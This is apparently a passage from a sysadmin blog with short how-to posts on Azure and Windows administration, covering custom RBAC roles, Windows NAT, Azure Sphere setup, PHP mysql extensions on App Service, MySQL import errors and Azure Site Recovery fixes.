  5. You will usually find more changed registry entries than expected – e.g. telemetry-related ones – but copy to the clipboard only those that are required:

  6. Now such entries have to be converted to PowerShell. I used to do this manually, but I accidentally came across https://reg2ps.azurewebsites.net/, where it can be done automatically; a sketch of what such a script typically looks like follows below.

    Just in case, the source code is available here: https://github.com/rzander/REG2CI/. The NirSoft program is registrychangesview-x64.
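
A sketch of a generated PowerShell fragment (the key path and value name here are hypothetical examples, not actual output of the tool):

# Create the key if it does not exist, then set a DWORD value
$path = "HKLM:\SOFTWARE\Policies\Microsoft\Windows\Example"
if (-not (Test-Path $path)) { New-Item -Path $path -Force | Out-Null }
New-ItemProperty -Path $path -Name "ExampleSetting" -Value 1 -PropertyType DWord -Force | Out-Null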

Read-Only Access to Policy Definition and Compliance Reports – fast manual

Create a Custom Role definition file e.g.:

notepad $env:TMP\PolicyReader.json

content:

{
  "Name": "Policy Reader",
  "Id": "0ab0b1a8-8aac-4efd-b8c2-3ee1fb270be8",
  "IsCustom": true,
  "Description": "Policy Reader.",
  "Actions": [
    "Microsoft.Authorization/policySetDefinitions/read",
    "Microsoft.Authorization/policyDefinitions/read",
    "Microsoft.Authorization/policyAssignments/read"
  ],
  "NotActions": [],
  "DataActions": [],
  "NotDataActions": [],
  "AssignableScopes": [
    "/subscriptions/28c890b5-46e8-44a2-8f59-30e51cadd7f9"
  ]
}

Using PowerShell:

Connect-AzAccount
Get-AzSubscription
Select-AzSubscription -SubscriptionId x-x-x-x-xxx
New-AzRoleDefinition -InputFile $env:TMP\PolicyReader.json
Get-AzRoleDefinition | ? {$_.IsCustom -eq $true} | FT Name, IsCustom

Unfortunately, you must do it for each subscription.
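
If you want to script that, a loop sketch over all subscriptions you can see (it assumes you first update AssignableScopes in the JSON for each subscription; otherwise New-AzRoleDefinition will fail):

# Create the custom role in every visible subscription
Get-AzSubscription | ForEach-Object {
    Select-AzSubscription -SubscriptionId $_.Id
    # Remember: AssignableScopes in the JSON must contain this subscription
    New-AzRoleDefinition -InputFile $env:TMP\PolicyReader.json
}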

You can also use the built-in Security Reader role, which gives access to workspaces and support – https://docs.microsoft.com/pl-pl/azure/role-based-access-control/built-in-roles#security-reader.

This is a fast outline – to understand what you are doing, please visit: https://docs.microsoft.com/en-us/azure/role-based-access-control/tutorial-custom-role-powershell.

 

Nat on Windows 2016+ or on Windows 10 – quick config

Sometimes we need to enable internal NAT on Windows, especially when we want to share the host's Internet connection with a virtual machine (using nested virtualization in Azure) or with Windows containers.

Issue commands:

New-VMSwitch -SwitchName "NAT" -SwitchType Internal
New-NetIPAddress -IPAddress 10.0.0.1 -PrefixLength 24 -InterfaceAlias "vEthernet (NAT)"
New-NetNat -Name NATnetwork -InternalIPInterfaceAddressPrefix 10.0.0.0/24
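
Inside the guest VM, point the network adapter at the NAT gateway; a sketch with a placeholder interface alias:

# Give the guest a static IP in the NAT subnet and use the host as the gateway
New-NetIPAddress -IPAddress 10.0.0.4 -PrefixLength 24 -InterfaceAlias "Ethernet" -DefaultGateway 10.0.0.1
# Any reachable DNS server will do; 8.8.8.8 is just an example
Set-DnsClientServerAddress -InterfaceAlias "Ethernet" -ServerAddresses 8.8.8.8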

Custom Roles in Azure – case Azure Kubernetes Service (update)

Azure Role-Based Access Control is great! You can assign roles to users to grant specific access and actions. But you cannot always find the specific role you need; in this case, I needed to let specific users modify an Azure Kubernetes Service cluster, but not delete it or create a new one.

In such a case, we need to create a Custom Role that does exactly what we want. You can use this process to create any custom role – here is a fast step by step:

#Install-Module -Name Az -AllowClobber
#Connect-AzAccount
Get-AzSubscription
Select-AzSubscription -SubscriptionId f31d408c-1e0e-478c-a887-ddb7c7ea78d0
Get-AzProviderOperation "Microsoft.ContainerService/*" | Out-GridView
Get-AzRoleDefinition -Name "Azure Kubernetes Service Cluster Admin Role"
Get-AzRoleDefinition -Name "Azure Kubernetes Service Cluster Admin Role" | ConvertTo-Json
Get-AzRoleDefinition -Name "Azure Kubernetes Service Cluster Admin Role" | ConvertTo-Json | Out-File $env:TMP\AKSResizeCluster.json
notepad $env:TMP\AKSResizeCluster.json
New-AzRoleDefinition -InputFile $env:TMP\AKSResizeCluster.json
Get-AzRoleDefinition | ? {$_.IsCustom -eq $true} | FT Name, IsCustom

Modified AKSResizeCluster.json file (give it a new Name, set IsCustom to true, and add your subscription scope at the end):

{
  "Name": "Azure Kubernetes Service Cluster Write Role",
  "Id": "8783b508-5073-4565-aeeb-9d4a28dd6701",
  "IsCustom": true,
  "Description": "List cluster admin credential action and Write Privileges",
  "Actions": [
    "Microsoft.ContainerService/containerServices/read",
    "Microsoft.ContainerService/containerServices/write",
    "Microsoft.ContainerService/managedClusters/read",
    "Microsoft.ContainerService/managedClusters/write",
    "Microsoft.ContainerService/operations/read",
    "Microsoft.ContainerService/managedClusters/agentPools/read",
    "Microsoft.ContainerService/managedClusters/agentPools/write",
    "Microsoft.OperationalInsights/workspaces/sharedkeys/read",
    "Microsoft.OperationalInsights/workspaces/read",
    "Microsoft.OperationsManagement/solutions/write",
    "Microsoft.OperationsManagement/solutions/read"
  ],
  "NotActions": [],
  "DataActions": [],
  "NotDataActions": [],
  "AssignableScopes": [
    "/subscriptions/!!!Your_Subscription_ID!!!"
  ]
}

Just after that you have a new role, Azure Kubernetes Service Cluster Write Role, which you can assign in IAM to your K8s cluster in Azure; you also have to add it on the Resource Group where your Log Analytics workspace lives (e.g. the 78c-a887-ddb7c7ea78d0-WEU Log Analytics workspace).

This is fast outline – to understand what you are doing please visit: https://docs.microsoft.com/en-us/azure/role-based-access-control/tutorial-custom-role-powershell

Azure Sphere – First Step (The device is not responding – An unexpected problem occurred. Please try again; if the issue persists, please refer to aka.ms/azurespheresupport)

To set up an Azure Sphere device you need to create an Azure Sphere tenant, using this command:

azsphere tenant create -n "spheretenantname"

 

But, you can see:

error: The device is not responding. The device may be unresponsive if it is applying an Azure Sphere operating system update; please retry in a few minutes.

 

 

So first please update your device using:

azsphere device recover

 

After that you can create tenant:

azsphere tenant create -n AZSphereMF

 

If you do again:

azsphere device show-ota-status

you can see an error like this:

error: An unexpected problem occurred. Please try again; if the issue persists, please refer to aka.ms/azurespheresupport for troubleshooting suggestions and support.

 

Please ignore it; you can claim the device into the newly created tenant by running:

azsphere device claim

 

 

Please remember that you can do it only once per device (It is the security model of Azure Sphere).

 

You will probably want to connect your device to WiFi, so list the available networks with:

 

azsphere device wifi scan

 

 

And connect to WiFi:

azsphere device wifi add --ssid My5GNetwork --key secretnetworkkey

 

You can check connection status by issuing:

 

azsphere device wifi show-status

 

 

Now you are ready to deploy your first application to Azure Sphere!

Azure App Service on Linux – mysql and mysqli driver

Azure Web App / Azure App Service on Linux does not offer the mysql and mysqli drivers to connect to a MySQL database by default. The lowest available PHP version is 5.6. Sometimes, though, you need to move an older application to the cloud.

If your application uses MySQL driver you probably see an error like this:

ErrorException [ Fatal Error ]: Call to undefined function mysql_connect()

So here is an example of how to install an extension in Azure App Service on Linux, similar to the Windows procedure. I add the MySQL driver to a Web App / Azure App Service on Linux, but you can add other extensions the same way.

First, go to the Configuration tab and in the application settings add PHP_INI_SCAN_DIR, pointing to the directory where you will put the configuration files for your extensions.

In this example, I added /home/site/ini.
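
You can also add the setting from PowerShell; a sketch with placeholder names (the default conf.d prefix in the value is an assumption for the PHP image, and note that Set-AzWebApp replaces the whole app settings collection, so merge your existing settings first in real use):

# Add PHP_INI_SCAN_DIR as an app setting on the Linux Web App
Set-AzWebApp -ResourceGroupName "my-rg" -Name "my-linux-webapp" -AppSettings @{ "PHP_INI_SCAN_DIR" = "/usr/local/etc/php/conf.d:/home/site/ini" }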

Next, create that directory (/home/site/ini) in your Web App (you can use SSH access or FTP). I also suggest creating another directory such as /home/site/ext, where you put the binaries of your extensions.

Finally, in /home/site/ini put a file named .extensions with configuration like:

extension=/home/site/ext/mysql.so

and in /home/site/ext put binary of your extension.

It should look like this:

After putting the files in place, please Stop and Start your App Service, and the extension should be loaded. Check your Log Streaming to confirm that the application restarted. If you need to compile your own extensions, check the Apache and system versions in the logs, like here:

You can get operating system version by issuing: cat /etc/os-release

Here are example files that you can use to add the mysql and mysqli drivers:

WebAppMySQLMySQLiExtensions

mysqlnd cannot connect to MySQL 4.1+ using the old insecure authentication

When you move a MySQL database from your hosting provider to Azure Database for MySQL and try to connect to it, you can see something like this:

mysql_connect(): mysqlnd cannot connect to MySQL 4.1+ using the old insecure authentication. Please use an administration tool to reset your password with the command SET PASSWORD = PASSWORD(‘your_existing_password’). This will store a new, and more secure, hash value in mysql.user. If this user is used in other scripts executed by PHP 5.2 or earlier you might need to remove the old-passwords flag from your my.cnf file

On the internet you can find advice about resetting the password or adding a parameter like:

old_passwords=0

That can help with an on-premises installation, but for Azure the solution is to change the PHP version to a higher one, for example from 5.3.29 to 5.4.16 – not a big change, and the application can then connect to Azure Database for MySQL.



Import Database to Azure Database for MySQL or for MariaDB – real case (Got error 1 from storage engine, you need (at least one of) the SUPER privilege(s) for this operation)

Some time ago Microsoft launched Azure Database for MySQL and Azure Database for MariaDB, so we can use these databases as a Platform as a Service. We are not responsible for the operating system, database engine upgrades, security.

If you need to move your workloads to Azure, simply run a command like this on your source server:

mysqldump --single-transaction -u user_name -p database_name > dump.sql

This simply dumps your MariaDB or MySQL database to a dump.sql file. After that, you can create an Azure Database for MySQL or Azure Database for MariaDB in Azure and connect to it using a GUI database management tool – MySQL Workbench (https://dev.mysql.com/downloads/workbench/). To download it, please use the other downloads section, which installs just MySQL Workbench and not a local MySQL database server.

Before installing MySQL Workbench, please check that you have installed all the prerequisites: https://dev.mysql.com/resources/workbench_prerequisites.html.

After installing the GUI, add a new MySQL connection to your newly created Azure Database for MySQL or MariaDB.

Usually, to be compatible with your application, you will need to disable the SSL connection to your database, and you must add the IP address that is allowed to connect to it.

Once you are able to connect to the Azure database, you are ready to import the database using the Server / Data Import option. You have to create a new Default Target Schema.

If something goes wrong you will see an error with the line number, but usually you will not get much more information. So the better option for importing the DB is to open the dump in a new query editor (File / New Query Tab) and load the dump there.

You can then start the import by pressing Run.

If you did not create the database before, do it using these commands:

create database database_name;

use database_name;

Also put the use database_name; command in the first line of your dump.

If there is any error during the import, you will see it in the Output pane:

So you can correct your dump and import it again.

Here are my simple corrections:

  • Got error 1 from storage engine

CREATE TABLE `clients_log` ( … ) ENGINE=MyISAM AUTO_INCREMENT=12240 DEFAULT CHARSET=utf8    Error Code: 1030. Got error 1 from storage engine

It is just because MyISAM is not supported in Azure Database for MySQL, primarily due to the lack of transaction support which can potentially lead to data loss. This is one of the reasons MySQL switched over to InnoDB as the default.

So you need to replace every ENGINE=MyISAM with nothing (an empty string).

  • Access denied; you need (at least one of) the SUPER privilege(s) for this operation

/*!50001 CREATE ALGORITHM=UNDEFINED */ /*!50013 DEFINER=`xxxx_prod`@`localhost` SQL SECURITY DEFINER */    Error Code: 1227. Access denied; you need (at least one of) the SUPER privilege(s) for this operation

You need to modify the DEFINER from DEFINER=`xxxx_prod`@`localhost` to DEFINER=`your_username`@`%` (the username is the part before the @ shown in the Azure portal).
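
Both fixes can be scripted before importing; a PowerShell sketch (your_username is a placeholder for the admin login from the Azure portal):

# Fix the dump before importing: drop MyISAM and rewrite the DEFINER
$dump = Get-Content .\dump.sql -Raw
$dump = $dump -replace 'ENGINE=MyISAM', ''
$dump = $dump -replace 'DEFINER=`[^`]+`@`localhost`', 'DEFINER=`your_username`@`%`'
Set-Content .\dump_fixed.sql -Value $dump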

Having the database in Azure has several advantages, and the most important one is Intelligent Performance.

Azure Site recovery – Please provide targetAzureVmName that is supported by Azure

 

Sometimes when we set up replication in Azure Site Recovery we see this kind of error. The error message seems clear – but how do we resolve it?

Error ID
70169

Error Message
Enable protection failed as the virtual machine has special characters in its name.

Possible causes
The name ‘KNG-WINDOWS’ contains characters that are not allowed or regarded as reserved words/trademarks by Azure.

Recommendation
Please provide targetAzureVmName that is supported by Azure. If using Powershell, re-run the Enable protection command and use the -TargetName parameter to provide a name for the virtual machine that is supported by Azure. Read more about naming conventions in Azure at https://docs.microsoft.com/en-us/azure/architecture/best-practices/naming-conventions.

Related links
https://docs.microsoft.com/en-us/azure/architecture/best-practices/naming-conventions

How to resolve this error:

  • Go to the resource group where your Vault exists, choose the Deployments tab, and copy the Template JSON – all lines.

  • Go to your vault, open the replicated item that is in the error state, and disable replication.

  • Then create a New Deployment from the template: just click New, type Template, and choose Template deployment.

  • Choose Build your own template in the editor, paste the template copied in the first step, and near the last line change targetAzureVmName to a supported one.

  • Click Save, choose the same Resource Group, and click Purchase.

Azure Site Recovery – Dynamic Disks or Multiple system disks 1,0 found. Azure doesn’t support multiple system disks

When we try to install the Mobility Agent on a Windows Server with a RAID 1 operating system disk, we can see this kind of error:

{
  "errors": [
    {
      "error_name": "ASRMobilityServiceMultipleBootDisks",
      "error_params": {
        "bootdisk": "1,0"
      },
      "default_message": "Multiple system disks 1,0 found. Azure doesn't support multiple system disks."
    },
    {
      "error_name": "ASRMobilityServiceMultipleSystemDisks",
      "error_params": {
        "systemdisk": "1,0"
      },
      "default_message": "Multiple system disks 1,0 found. Azure doesn't support multiple system disks."
    }
  ]
}

The only solution is to remove the RAID 1 mirror, like this:

After that, you will be able to install the Azure Site Recovery Mobility Agent. To avoid a Multiple OS disks found for the selected VM error like this:

You should disable RAID 1 for the C drive and the Reserved disk – and, in my case, also for the data partition that resided on the same disk.

After establishing replication, you can try to add the mirror once again.

Please remember that Azure Site Recovery does not support replicating Dynamic Disks, so you need to convert them to Basic. You can use EaseUS software for that without losing data, as shown here.

After you start replication, you can add the disk back to the mirror and convert the disk to dynamic, and replication will keep working.

Step by Step Video.

How to use the Azure Site Recovery Step by Step Course.

 

connect-azaccount – An error occurred while sending the request.

If you are using the PowerShell Az module (the AzureRM successor) and you see An error occurred while sending the request. after the Connect-AzAccount command, you are probably not using the latest version. Please check it:

Get-InstalledModule -Name Az.Accounts -AllVersions | Select-Object Name,Version

All Azure-Powershell releases:

https://github.com/Azure/azure-powershell/releases/
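
If you are behind, updating usually resolves it; a quick sketch:

# Update the Az module to the latest release (run in an elevated session)
Update-Module -Name Az -Force
# Or install it fresh if it did not come from the PowerShell Gallery
Install-Module -Name Az -AllowClobber -Force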
